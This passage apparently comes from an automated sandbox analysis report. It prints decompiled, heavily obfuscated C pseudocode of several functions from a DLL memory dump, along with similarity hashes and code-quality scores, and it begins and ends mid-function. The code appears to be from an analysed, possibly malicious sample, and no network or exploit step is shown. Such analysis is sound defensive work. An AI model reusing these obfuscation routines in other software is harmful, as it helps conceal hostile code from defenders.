    											_t387 = E6E4B39E0(_t554, _t618 - E6E4B2DD0(0xf7d10573, 0x7856dfe0), _t618, _t583, _v92, 0);
    											_v76 = _t554;
    											_t390 = E6E4B2860(_v80, _v20, 0x2cbd7a6e, 0x6f890398);
    											_t585 = _v28;
    											asm("sbb edx, [ebp-0x48]");
    											_t621 = _t390 - _t387 - 0x2cbd7a6e;
    											__eflags = _t390 - _t387 - 0x2cbd7a6e;
    											asm("sbb edx, eax");
    											_v76 = _t554;
    											_v136 =  *((intOrPtr*)(_v84 + _v116 * 4));
    											E6E4B6CC0(_t390 - _t387 - 0x2cbd7a6e, _v44, 0xfffffffe);
    											_t685 = _t675 + 0x60;
    											_v132 =  *((intOrPtr*)(_v48 + 0xf486394 + _v32 * 4));
    											0;
    											0;
    											while(1) {
    												_v28 = _t585;
    												_v20 = _t503;
    												_t398 = _t503;
    												_t530 = _v136;
    												_v32 = _t398 * _t530;
    												_v48 = _t585 * _t530 + (_t398 * _t530 >> 0x20);
    												_v44 = 0x491983;
    												_t588 = _v132;
    												_v80 =  !_t588;
    												_v84 =  !0x674cc49;
    												_t407 = E6E4B2DD0(0xe5a36c5, 0x781fc663);
    												_t533 = _v84;
    												E6E4BB3D0(__eflags, 0x674cc49, 0x491983, _t533, _v44);
    												_t687 = _t685 + 0x18;
    												__eflags = ((_t588 & _t533 | _t407 & _v80) ^ 0x0674cc49) - _v32;
    												asm("sbb ebx, [ebp-0x2c]");
    												if(((_t588 & _t533 | _t407 & _v80) ^ 0x0674cc49) >= _v32) {
    													break;
    												}
    												_t503 = _v20 - 1;
    												_t585 = _v28;
    												asm("sbb edi, 0x0");
    												_t559 = _v76;
    												asm("sbb edx, eax");
    												asm("adc edx, 0x0");
    												_t450 = E6E4B2860(_t621 - 0xde9a9e80 + _v92, _t559, 0xde9a9e80, 0x7d6da7a3);
    												_t685 = _t687 + 0x10;
    												_t621 = _t450;
    												_v76 = _t559;
    												__eflags = _t559;
    												if(_t559 == 0) {
    													continue;
    												}
    												_v28 = _t585;
    												_t535 = _v40;
    												_t558 = _v60;
    												_t622 = _v52;
    												_t592 = _v56;
    												L36:
    												_t411 =  *((intOrPtr*)(_t558 + 8));
    												_v20 = _t508;
    												 *_t411 = _t508;
    												_t509 = _v28;
    												 *((intOrPtr*)(_t411 + 4)) = _t509;
    												__eflags = _t509 - 1;
    												asm("sbb eax, 0x0");
    												 *_t558 = 2;
    												_t413 = E6E4C0170(_t509 - 1, _v72, _t535, _t558);
    												_t688 = _t687 + 0xc;
    												_t202 =  &(_t622[1]); // 0x4ba4e856
    												__eflags = _t592 -  *_t202;
    												if(_t592 >=  *_t202) {
    													_t622[1] = _v104;
    													_t206 =  &(_t622[2]); // 0xc483ffff
    													_t413 = E6E4CD3B0( *_t206, _v100);
    													_t688 = _t688 + 8;
    													_t622[2] = _t413;
    												}
    												__eflags = _t592;
    												 *_t622 = 0;
    												if(__eflags < 0) {
    													L43:
    													_t623 = _v52;
    													_t414 = E6E4CCA50(_t413, _t558, __eflags, _t623, _v72);
    													_t689 = _t688 + 8;
    													__eflags = _t414;
    													if(__eflags != 0) {
    														E6E4C2110(_t623, _v40);
    														_t437 = E6E4B6CC0(__eflags, _v20, 0xffffffff);
    														_t689 = _t689 + 0x10;
    														_v20 = _t437;
    													}
    													E6E4CAC60(_t535, _t623, _v72);
    													_t651 = _t689 + 8;
    													_t593 =  *_t623;
    													__eflags = _t593;
    													_t536 = _v24;
    													if(_t593 <= 0) {
    														L48:
    														__eflags = _t593 - _v56;
    														if(__eflags <= 0) {
    															_t421 = E6E4B6CC0(__eflags,  ~_t593,  ~_v124);
    															__eflags = _v96 - _t593 << 2;
    															E6E4C9EE0(_v36[2] - (_t421 << 2), 0, _v96 - _t593 << 2);
    															_t651 = _t651 + 0x14;
    														}
    														_t537 = _a4;
    														_t574 = _v24;
    														_t553 = _v20;
    														 *(_t537[2] + _t574 * 4) = _t553;
    														__eflags = _t553;
    														if(_t553 != 0) {
    															 *_t537 = _t574;
    														}
    														goto L30;
    													} else {
    														_t230 =  &(_t623[2]); // 0xc483ffff
    														_v28 =  *_t230;
    														_v32 = _v36[2];
    														_t626 = 0;
    														__eflags = 0;
    														0;
    														0;
    														do {
    															E6E4B6CC0(__eflags, _t626, _t536);
    															 *((intOrPtr*)(_v32 + (_t626 + _t536) * 4)) =  *((intOrPtr*)(_v28 + _t626 * 4));
    															_t626 = E6E4B6CC0(__eflags, _t626, 1);
    															_t593 =  *_v52;
    															_t435 = E6E4B3B00(_t626, _t593);
    															_t536 = _v24;
    															_t651 = _t651 + 0x18;
    															__eflags = _t435 & 0x00000001;
    														} while (__eflags != 0);
    														goto L48;
    													}
    												} else {
    													_v28 = _v36[2];
    													_t212 =  &(_v52[2]); // 0xc483ffff
    													_t511 =  *_t212;
    													_t595 = 0;
    													do {
    														_t214 = _t595 - 0x5b01f7d8; // -1526855640
    														_t442 = E6E4B6CC0(__eflags, _t214, _v24);
    														_t443 = E6E4B8AE0(0x532f0d54);
    														_t695 = _t688 + 0xc;
    														_t445 =  *(_v28 + (_t443 + _t442) * 4);
    														 *(_t511 + _t595 * 4) = _t445;
    														__eflags = _t445;
    														if(_t445 != 0) {
    															_t221 = _t595 + 1; // 0x1
    															 *_v52 = _t221;
    														}
    														_t413 = E6E4B2640(0, 1);
    														_t688 = _t695 + 8;
    														_t535 = _t595 - _t413;
    														__eflags = _t595 - _v56;
    														_t595 = _t595 - _t413;
    													} while (__eflags != 0);
    													goto L43;
    												}
    											}
    											_t535 = _v40;
    											_t558 = _v60;
    											_t622 = _v52;
    											_t592 = _v56;
    											_t508 = _v20;
    											goto L36;
    											L30:
    											_t367 = _v128 + 1;
    											__eflags = _t367 - _v108;
    											_t611 = _v56;
    										} while (_t367 != _v108);
    										goto L52;
    									}
    								}
    								E6E4CCA10(_v88, _t546);
    								_t610 = _v36;
    								E6E4C6740(_t546, _t610, _v88);
    								_t651 = _t651 + 0x10;
    								goto L24;
    							}
    						}
    						_t563 =  *_t306;
    						_t514 = _t306;
    						_t600 = _a4;
    						__eflags =  *(_t600 + 4) - _t563;
    						if( *(_t600 + 4) >= _t563) {
    							_t468 = _t514;
    							__eflags = _t563;
    							if(_t563 <= 0) {
    								L9:
    								_t469 = _a8;
    								L21:
    								E6E4CCA10(_t469, 0);
    								 *_t600 = 0;
    								_t576 = _v40;
    								_t489 = _v36;
    								goto L58;
    							}
    							L18:
    							_v48 = _t468[2];
    							_v24 =  *((intOrPtr*)(_t520 + 8));
    							_v44 =  *((intOrPtr*)(_t600 + 8));
    							_t516 = 0;
    							_t636 = 0;
    							__eflags = 0;
    							0;
    							0;
    							0;
    							do {
    								_v28 = _t563;
    								_v20 = _t516;
    								_t474 = E6E4B2640(_t563, 1);
    								_t517 = _t474;
    								_v32 = _t474;
    								_t475 = E6E4B2DD0(0x82efaac, 0x7856dfe0);
    								_t643 = _t643 + 0x10;
    								_t549 = _t475;
    								_t637 = _t636 << _t549;
    								__eflags = _t549 & 0x00000020;
    								_t603 =  !=  ? _t637 : (0 << 0x00000020 | _t636) << _t549;
    								_t638 =  !=  ? 0 : _t637;
    								_t640 = ( !=  ? 0 : _t637) ^  *(_v48 + _t517 * 4) | ( !=  ? 0 : _t637) &  *(_v48 + _t517 * 4);
    								_t480 = E6E4C1B40(( !=  ? 0 : _t637) ^  *(_v48 + _t517 * 4) | ( !=  ? 0 : _t637) &  *(_v48 + _t517 * 4),  !=  ? _t637 : (0 << 0x00000020 | _t636) << _t549,  *_v24, 0);
    								 *(_v44 + _t517 * 4) = _t480;
    								__eflags = _t480;
    								_t481 = _v20;
    								_t519 =  ==  ? _t481 : _v28;
    								__eflags = _t481;
    								_t516 =  !=  ? _t481 :  ==  ? _t481 : _v28;
    								_t636 = E6E4C9F80(( !=  ? 0 : _t637) ^  *(_v48 + _t517 * 4) | ( !=  ? 0 : _t637) &  *(_v48 + _t517 * 4),  !=  ? _t637 : (0 << 0x00000020 | _t636) << _t549,  *_v24, 0);
    								_t563 = _v32;
    								__eflags = _t563;
    							} while (_t563 > 0);
    							_t469 = _a8;
    							_t600 = _a4;
    							goto L21;
    						}
    						 *(_t600 + 4) = _t563;
    						_t484 = E6E4CD3B0( *((intOrPtr*)(_t600 + 8)), _t563 << 2);
    						_t520 = _a16;
    						_t643 = _t643 + 8;
    						 *((intOrPtr*)(_t600 + 8)) = _t484;
    						_t468 = _t514;
    						_t563 =  *_t514;
    						__eflags = _t563;
    						if(_t563 > 0) {
    							goto L18;
    						}
    						goto L9;
    					}
    					 *_a4 = 0;
    					E6E4CCA10(_a8, 0);
    					L4:
    					_t576 = _v40;
    					goto L5;
    				}
    				 *_a4 = 0;
    				E6E4BDAD0(_t565, _a8);
    				goto L4;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: N Ln
    • API String ID: 0-2483354276
    • Opcode ID: b8a54cfe708afbe71e637b34894f557089180e8760db2e229c64f1dcec228321
    • Instruction ID: 9363f0f49fb479c15831492a1bd9f852ab0095c888ea5dfc90bf245b61d9c56b
    • Opcode Fuzzy Hash: b8a54cfe708afbe71e637b34894f557089180e8760db2e229c64f1dcec228321
    • Instruction Fuzzy Hash: 68525DB9E002199FDB00CFF8DC45EAEB7B9EF48718F154529E815A7351E731AD018BA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E6E4B68C0(signed int _a4, signed int _a8, signed int _a12, char _a16) {
    				void* _v16;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t54;
    				signed int _t62;
    				signed int _t63;
    				signed int _t64;
    				signed int _t73;
    				signed int _t76;
    				signed int _t79;
    				signed int _t85;
    				signed int _t87;
    				signed int _t93;
    				signed int _t95;
    				signed int _t102;
    				signed int _t109;
    				signed int _t110;
    				signed int _t111;
    				signed int _t116;
    				signed int _t118;
    				signed int _t119;
    				signed int _t121;
    				signed int* _t123;
    
    				_t123 = (_t121 & 0xfffffff8) - 0x20;
    				_t1 =  &_a16; // 0x6e4c3526
    				_t79 =  *_t1;
    				_t119 = _a12;
    				_t116 = _a8;
    				_t118 = _a4;
    				_t45 = _t118 - _t119;
    				asm("sbb ecx, ebx");
    				_v36 = _t116;
    				_v40 = _t45;
    				_t47 = _t45 + _t118 + _t119;
    				_v44 = _t47;
    				 *_t123 = _t47 + _t119;
    				_t49 = _v40;
    				_t85 =  *_t123 - _t49 ^ _t119;
    				 *_t123 = _t85;
    				_t87 = _t85 + _t119 ^ _t119;
    				_v28 = _t87;
    				_v44 = _t87 + _t49;
    				if((_v36 ^ _t116 | _v40 ^ _t118) != 0 || (_t116 ^ _t79 | _t118 ^ _t119) != 0) {
    					_t54 = (_v44 ^ _t118) + _t118;
    					_v44 = _t54;
    					_t93 = _t54 | _t119;
    					 *_t123 = _t93;
    					_t95 = _t93 * _t54 * _v40;
    					_v28 = _t95;
    					_v32 = _t95 + 0x2bb;
    				}
    				if( *0x6e4d508c == 0x82184f75 && ( *_t123 >> 0x0000001f ^ _t116 | _t118 ^  *_t123) != 0 && (_t79 ^ _t116 | _t119 ^ _t118) != 0) {
    					_t73 = _v32 -  *_t123;
    					_v28 = _t73;
    					_v32 = _t73 + _t118;
    					E6E4B5820(_v44, _t73 + _t118);
    					_t116 = _a8;
    					_t123 =  &(_t123[2]);
    					_t76 = _v40;
    					_t109 = _v32 & _t76;
    					_v24 = _t109;
    					_t110 = _t109 * _t76;
    					_v28 = _t110;
    					_t111 = _t110 & _t119;
    					 *_t123 = _t111;
    					_v44 = _t111 & _t119;
    				}
    				asm("sbb eax, ebx");
    				if(_t118 >= _t119 && (_v36 ^ _t116 | _v40 ^ _t118) == 0 && (_t79 ^ _v36 | _t119 ^ _v40) == 0) {
    					asm("sbb ecx, edx");
    					if(_v24 >= _t118) {
    						_t62 = _v44 - _v24;
    						_v24 = _t62;
    						_t63 = _t62 | _v40;
    						_v44 = _t63;
    						_t102 =  *_t123;
    						_t64 = _t63 + _t102;
    						 *_t123 = _t64;
    						_v28 = _t102;
    						_v32 = _t64 * _t102;
    					}
    				}
    				 *0x6e4d50a4 = _v32;
    				return _v40;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: &5Ln
    • API String ID: 0-1887126739
    • Opcode ID: 7f852410919c0e65c74cc31919f7e61b8d470932b8adf4d5283a0fb7dcdb3244
    • Instruction ID: 1d3f40a332c9ba3508ddeec99fd1b16060593923bc5bcf058af5c6ce675fe7b5
    • Opcode Fuzzy Hash: 7f852410919c0e65c74cc31919f7e61b8d470932b8adf4d5283a0fb7dcdb3244
    • Instruction Fuzzy Hash: 54410A717283029FCB48DF78D9A196EBBE5EBC8710F04882EA59AC7350D774D8448B92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E6E4C88F0(void* __eflags) {
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				intOrPtr _v40;
    				intOrPtr* _t67;
    				intOrPtr _t68;
    				signed int _t69;
    				signed int _t74;
    				signed int _t75;
    				signed int _t80;
    				signed int _t84;
    				signed int _t89;
    				signed int _t92;
    				unsigned int _t95;
    				signed int _t99;
    				signed int _t103;
    				signed int _t104;
    				signed int _t113;
    				signed int _t117;
    				signed int _t118;
    				signed int _t125;
    				signed int _t126;
    				signed int _t128;
    				signed int _t130;
    				signed int _t134;
    				signed int _t137;
    				void* _t138;
    				signed int _t144;
    				void* _t150;
    				signed int _t151;
    				signed int _t155;
    				signed int _t160;
    				signed int _t173;
    				signed int _t182;
    				signed int _t186;
    				signed int _t192;
    				signed int _t230;
    				signed int _t234;
    				signed int _t240;
    				signed int _t261;
    				signed int _t272;
    				void* _t288;
    				void* _t290;
    				void* _t291;
    				void* _t348;
    
    				_t67 = E6E4CF5C0(0, E6E4B8AE0(0x8e82bd8));
    				_t290 = _t288 + 0xc;
    				_t68 =  *_t67();
    				_t348 = _t68 -  *0x6e4d7a68; // 0x46a7b5
    				if(_t348 != 0) {
    					 *0x6e4d7a68 = _t68;
    					E6E4CCAE0(_t348, _t68);
    					_t290 = _t290 + 4;
    				}
    				_pop(_t286);
    				_t291 = _t290 - 0x14;
    				if( *0x6e4d70b0 >= 0x270) {
    					_t261 = 0;
    					_t103 = 0xfffffc74;
    					do {
    						_v28 = _t103;
    						_t104 = E6E4B74F0(0, 0x80000000, 0xffffffff);
    						E6E4B88A0(0,  *(_t103 + 0x6e4d6a7c), 0x80000000);
    						_v36 = _t261 + 1;
    						_v24 = E6E4BA420(0,  *(_v28 + 0x6e4d6a80) & 0x7ffffffe & (_t104 ^  *(_t103 + 0x6e4d6a7c)) &  *(_t103 + 0x6e4d6a7c),  *(_v28 + 0x6e4d6a80) & 0x7ffffffe ^ (_t104 ^  *(_t103 + 0x6e4d6a7c)) &  *(_t103 + 0x6e4d6a7c));
    						E6E4BA420(0,  *(_v28 + 0x6e4d6a80) & 0x7ffffffe, (_t104 ^  *(_t103 + 0x6e4d6a7c)) &  *(_t103 + 0x6e4d6a7c));
    						_v32 =  *((intOrPtr*)(0x6e4d70b0 + _v28));
    						_v24 = _v24 >> 1;
    						_t113 = E6E4B74F0(0, 1, 0xffffffff);
    						E6E4B88A0(0,  *(_v28 + 0x6e4d6a80), 1);
    						_t117 = E6E4B88A0(0, 0x9eb9c38f,  !( *(0x6e4d3a48 + ((_t113 ^  *(_v28 + 0x6e4d6a80)) &  *(_v28 + 0x6e4d6a80)) * 4)));
    						_t118 = E6E4B88A0(0,  *(0x6e4d3a48 + ((_t113 ^  *(_v28 + 0x6e4d6a80)) &  *(_v28 + 0x6e4d6a80)) * 4), 0x61463c70);
    						_v32 = E6E4B74F0(0, _t118 | _t117, E6E4B88A0(0, _v32, 0x61463c70) |  !_v32 & 0x9eb9c38f);
    						_v40 = E6E4B88A0(0, E6E4B8AE0(0xd65d1f61),  !_t122);
    						_t182 = _v24;
    						_t125 = E6E4B74F0(0, _t182, 0xffffffff);
    						_t126 = E6E4B8AE0(0xd65d1f61);
    						_t261 = _v36;
    						_t128 = E6E4BA420(0, _v40, _t122 & 0x218c1a12);
    						E6E4B74F0(0, _v32, _v24);
    						_t130 = _v28;
    						_t291 = _t291 + 0x78;
    						 *(_t130 + 0x6e4d6a7c) = _t128 ^ (_t182 & 0x218c1a12 | _t126 & _t125);
    						_t103 = _t130 + 4;
    						_t351 = _t103;
    					} while (_t103 != 0);
    					_t230 = 0xe3;
    					do {
    						_t272 = 0x6e4d66f0[_t230];
    						_t186 = E6E4B74F0(_t351, _t272, 0x7fffffff) & _t272;
    						_t26 = _t230 - 0x58c0e74; // -93064593
    						_v24 = _t230;
    						_t134 = E6E4B6CC0(_t351, E6E4B6CC0(_t351, _t26, 1), 0x58c0e74);
    						_v36 = _t134;
    						E6E4B6CC0(_t351, _t230, 1);
    						_t234 =  !(E6E4B8AE0(0x77d10572) ^ 0x6e4d66f0[_t134]) & 0x6e4d66f0[_t134];
    						_t137 = E6E4B88A0(_t351, _t234, _t186);
    						_t138 = E6E4B8AE0(0xb972351b);
    						E6E4B8AE0(0xf7d10591);
    						_v28 =  *((intOrPtr*)(0x33c0a1c0 + (_v24 - _t138) * 4));
    						_v32 = E6E4B88A0(_t351, 0xa0822408, E6E4B74F0(_t351,  *(0x6e4d3a48 + E6E4B88A0(_t351, 0x6e4d66f0[_t134] & 0x00000001, 0xffffffff) * 4), 0xffffffff));
    						_t144 = E6E4B8AE0(0xa8acde84);
    						0x6e4d66f0[_v24] = E6E4B74F0(_t351,  *(0x6e4d3a48 + E6E4B88A0(_t351, 0x6e4d66f0[_t134] & 0x00000001, 0xffffffff) * 4) & 0x5f7ddbf7 | _v32, E6E4BA420(_t351, _t144 &  !_v28, E6E4B88A0(_t351, _v28, 0x5f7ddbf7))) ^ (_t234 ^ _t186 | _t137) >> 0x00000001;
    						_t150 = E6E4B8AE0(0x82ef8e3);
    						_t291 = _t291 + 0x6c;
    						_t230 = _v36;
    					} while (_t230 != _t150);
    					_t192 =  *0x6e4d66f0; // 0xe4d71c4f
    					_t151 = E6E4B8AE0(0x77d10572);
    					_t240 =  *0x6e4d6d20; // 0xf97954f3
    					_t155 = E6E4B8AE0(0xbc5d8869);
    					_t353 = (_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 0x00000001 & 0x4b8c8d1a |  !((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 1) & 0xb47372e5;
    					_t160 = E6E4B74F0((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 0x00000001 & 0x4b8c8d1a |  !((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 1) & 0xb47372e5, ( !_t240 &  *(0x6e4d3a48 + (_t192 & 0x00000001) * 4) |  !( *(0x6e4d3a48 + (_t192 & 0x00000001) * 4)) & _t240) & 0x4b8c8d1a | _t155 &  !( !_t240 &  *(0x6e4d3a48 + (_t192 & 0x00000001) * 4) |  !( *(0x6e4d3a48 + (_t192 & 0x00000001) * 4)) & _t240), (_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 0x00000001 & 0x4b8c8d1a |  !((_t151 & _t192 ^ 0x80000000 &  *0x6e4d70ac | _t151 & _t192 & 0x80000000) >> 1) & 0xb47372e5);
    					_t291 = _t291 + 0x10;
    					 *0x6e4d70ac = _t160;
    					 *0x6e4d70b0 = 0;
    				}
    				_t69 =  *0x6e4d70b0; // 0x1
    				_t47 = _t69 + 1; // 0x2
    				 *0x6e4d70b0 = _t47;
    				_v24 = 0x6e4d66f0[_t69];
    				_v28 = E6E4B74F0(_t353, 0x6e4d66f0[_t69] >> 0xb, 0xffffffff) & 0x4298b002;
    				_v36 = E6E4B74F0(_t353, E6E4B8AE0(0x4ab64a8e), 0xffffffff);
    				_t74 = E6E4B88A0(_t353, 0x6e4d66f0[_t69] >> 0xb, _t73);
    				_t75 = E6E4B8AE0(0x4ab64a8e);
    				_v24 = E6E4B88A0(_t353, ((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)) << 7, 0x9d2c5680);
    				_t80 = E6E4B8AE0(0x360b6090);
    				_v24 = E6E4B88A0(_t353, _v24, 0xc1da65e3);
    				_t84 = E6E4B88A0(_t353,  !((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)), 0x3e259a1c);
    				_t89 = E6E4B88A0(_t353, E6E4B74F0(_t353, E6E4BA420(_t353, _t80 &  !_t79, _v24), ((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)) & 0xc1da65e3 | _t84) << 0x0000000f ^ 0x1039ffff, E6E4B74F0(_t353, E6E4BA420(_t353, _t80 &  !_t79, _v24), ((E6E4B88A0(_t353, _v24, _v36) | _t75 &  !_v24) ^ (_t74 | _v28)) & 0xc1da65e3 | _t84) << 0xf);
    				E6E4B8AE0(0xe7e8fa8c);
    				_t92 = E6E4B88A0(_t353, E6E4B8AE0(0x2d1f8c36),  !_t89);
    				_t95 = E6E4B74F0(_t353, E6E4B88A0(_t353, _t89, 0xdace8945) | _t92, _t86 & 0xdace8945 |  !_t86 & 0x253176ba);
    				_v24 = _t95;
    				_v28 = E6E4B8AE0(0x79befae2) &  !(_t95 >> 0x12);
    				_t173 =  !(E6E4B8AE0(0x79befae2));
    				_t99 = E6E4B8AE0(0x79befae2);
    				return E6E4BA420(_t353, _v28, _t95 >> 0x00000012 & _t173) ^ (_t173 & _v24 | _t99 &  !_v24);
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0a21bfc6c6906125fc00148c3588fd88febc5f8c77c8ddf3bbbf2f80f26f6fb0
    • Instruction ID: 6c061dfc308ae4991f620b8bed8f6a7c17e1fade7b3b1c7201c56c7c5114d155
    • Opcode Fuzzy Hash: 0a21bfc6c6906125fc00148c3588fd88febc5f8c77c8ddf3bbbf2f80f26f6fb0
    • Instruction Fuzzy Hash: 26D103F7D101116BEB009AF5AC45DBF39A9AB5922DF190929E818B7381FB319E1143F2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E6E4B7170(void* __eflags, signed char* _a4, signed int _a8, intOrPtr* _a12) {
    				signed int _v17;
    				unsigned char _v18;
    				signed int _v24;
    				signed char* _v28;
    				char _v29;
    				signed char _v30;
    				signed char _v31;
    				signed char _v36;
    				signed int _v37;
    				unsigned int _v38;
    				signed char _v39;
    				void* _v40;
    				intOrPtr _v44;
    				char* _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				char _v137;
    				char* _t75;
    				char* _t77;
    				char _t78;
    				char* _t80;
    				signed char _t81;
    				signed char _t82;
    				void* _t84;
    				signed char _t87;
    				signed char _t90;
    				char _t103;
    				void* _t104;
    				signed char _t109;
    				void* _t111;
    				signed char _t114;
    				intOrPtr _t116;
    				void* _t118;
    				char _t120;
    				signed int _t123;
    				signed int _t124;
    				void* _t127;
    				signed char _t132;
    				signed char _t134;
    				unsigned char _t135;
    				signed char _t136;
    				signed char _t143;
    				char* _t149;
    				signed int _t150;
    				signed char* _t155;
    				signed char* _t168;
    				intOrPtr* _t179;
    				signed int _t180;
    				void* _t181;
    				char* _t184;
    				signed char _t186;
    				intOrPtr _t187;
    				signed int _t190;
    				void* _t192;
    				void* _t193;
    				void* _t194;
    				void* _t197;
    				void* _t199;
    				void* _t208;
    				void* _t211;
    				void* _t219;
    				signed int _t223;
    
    				_t219 = __eflags;
    				_v56 = E6E4B1250(0x6e4d34b0,  &_v137);
    				_v24 = _a8;
    				_t75 = E6E4CD310( ~(E6E4B6CC0(_t219,  ~_a8, 0xffffffff)));
    				_t197 = _t194 + 0x14;
    				_t184 = _t75;
    				if(_t75 == 0) {
    					L28:
    					return _t184;
    				}
    				_t77 = _t184;
    				if(_a8 <= 0) {
    					L26:
    					 *_t77 = 0;
    					_t179 = _a12;
    					__eflags = _t179;
    					if(_t179 != 0) {
    						_t78 = _t77 - _t184;
    						__eflags = _t78;
    						E6E4B2640(_t77, _t184);
    						 *_t179 = _t78;
    					}
    					goto L28;
    				} else {
    					_t155 = _a4;
    					_v24 =  &(_t155[_v24]);
    					_t80 = _t184;
    					_v44 = _t184;
    					do {
    						_v48 = _t80;
    						if(_t155 >= _v24) {
    							goto L4;
    						}
    						_t132 = 0;
    						_t223 = 0;
    						_v52 = 0;
    						do {
    							_v28 = _t155;
    							_t82 = E6E4BD6D0(_t223, _t155, _v24);
    							_t199 = _t197 + 8;
    							_t224 = _t82 & 0x00000001;
    							if((_t82 & 0x00000001) == 0) {
    								L17:
    								_t41 = _t132 - 0x5cb212c5; // -1555174085
    								_t84 = E6E4B6CC0(_t230, _t41, 1);
    								_t186 = _t84 - E6E4B8AE0(0xab6317b7);
    								E6E4B6CC0(_t230, _t132, 1);
    								_t87 = E6E4B79D0(_t186, 4);
    								_t197 = _t199 + 0x1c;
    								_t155 = _v28;
    								if(_t155 >= _v24 || (_t87 & 0x00000001) == 0) {
    									break;
    								} else {
    									goto L19;
    								}
    							}
    							_v36 = _t132;
    							_t168 = _v28;
    							do {
    								_t150 =  *_t168 & 0x000000ff;
    								_v28 =  &(_t168[1]);
    								_t111 = E6E4BAB20(_t224, 0, 0xd5);
    								_t211 = _t199 + 8;
    								_t180 = 0;
    								_t225 = _t150 - _t111 - 0x4f;
    								if(_t150 - _t111 <= 0x4f) {
    									_t180 =  *((char*)(_v56 + _t150 + E6E4B8AE0(0xf7d10559)));
    									_t123 = E6E4B74F0(_t225, _t180, 0xffffffff);
    									_t124 = E6E4B74F0(_t225, 0xff, 0xffffffff);
    									_t211 = _t211 + 0x14;
    									_t190 = _t124 | _t123;
    									_t226 = _t190 - 0xffffffff;
    									if(_t190 != 0xffffffff) {
    										_t191 =  !_t190;
    										E6E4B8AE0(0x82efaa8);
    										_t27 = _t191 - 0x1a3af28e; // -440070798
    										_t127 = E6E4B6CC0(_t226, _t27, 0x1a3af251);
    										E6E4B6CC0(_t226,  !_t190, 0xffffffc3);
    										_t211 = _t211 + 0x14;
    										_t180 =  ==  ? 0 : _t127;
    									}
    								}
    								_t114 = E6E4B4C00(E6E4B8AE0(0x82efa73) & _t180, 0);
    								_t199 = _t211 + 0xc;
    								_t168 = _v28;
    							} while (_t168 < _v24 && (_t114 & 0x00000001) != 0);
    							_t230 = _t114 & 0x00000001;
    							if((_t114 & 0x00000001) == 0) {
    								_t36 = _v52 - 0x50dca6fb; // -1356637947
    								_t116 = E6E4B6CC0(__eflags, _t36, 0x50dca6fc);
    								E6E4B6CC0(__eflags, _v52, 1);
    								_t118 = E6E4B27A0(0xd2);
    								_t199 = _t199 + 0x14;
    								_t120 = _t118 + _t180 + 0xa1;
    								__eflags = _t120;
    								_t132 = _v36;
    								 *((char*)(_t193 + _t132 - 0x24)) = _t120;
    								_v52 = _t116;
    							} else {
    								_t132 = _v36;
    							}
    							goto L17;
    							L19:
    							_t223 = 1;
    							_t132 = _t186;
    						} while (1 != 0);
    						_t187 = _v52;
    						_t233 = _t187;
    						if(_t187 == 0) {
    							_t184 = _v44;
    							0;
    							goto L4;
    						}
    						_t134 = _v39;
    						_v36 = _t134;
    						_t135 = _t134 << 2;
    						_v18 = _t135;
    						_t136 = _t135 >> 4;
    						_v17 =  !_t136;
    						_t90 = E6E4B27A0(0xd0);
    						_t143 =  !(_v17 |  !_t136 &  !_t90 | _v17 & 0x0000005c);
    						_v31 = E6E4B7740(_t233, _t143 & 0x000000ff, E6E4B9950(0x5c,  !_t90 & 0x000000ff) & 0x000000ff) | _t143;
    						E6E4B27A0(0x88);
    						_t146 = _v38;
    						_v30 = _v38 >> E6E4B27A0(0x8e) ^ _t146 | _v38 >> E6E4B27A0(0x8e) & _t146;
    						_t103 = E6E4B9950(_v37 & _t146 << 0x00000006 & 0x000000ff, (_t146 << 0x00000006 ^ _v37) & 0x000000ff);
    						_t197 = _t197 + 0x24;
    						_v29 = _t103;
    						if(_t187 < 2) {
    							L25:
    							_t184 = _v44;
    							_t155 = _v28;
    							goto L4;
    						}
